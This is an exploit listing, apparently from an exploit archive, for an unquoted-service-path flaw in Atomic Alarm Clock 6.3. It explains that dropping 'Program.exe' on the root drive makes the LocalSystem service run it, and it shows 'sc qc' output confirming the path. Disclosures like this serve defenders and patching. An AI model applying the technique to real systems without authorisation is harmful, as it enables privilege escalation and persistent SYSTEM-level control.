Share
## https://sploitus.com/exploit?id=PACKETSTORM:157283
#Exploit Title: Atomic Alarm Clock (x86) - Local Privilege Escalation  
#Exploit Author: Bobby Cooke  
#Date: 04/17/2020  
#Vendor Homepage: http://www.drive-software.com  
#Software Link: http://www.drive-software.com/download/ataclock.exe  
#Version: 6.3  
#Tested On: Windows 10 Pro 1909 (32-bit)  
#Vulnerability Type:   
Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.  
#Vulnerability Description:  
The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.  
  
C:\Users\boku>sc qc AtomicAlarmClock  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: AtomicAlarmClock  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Atomic Alarm Clock Time  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem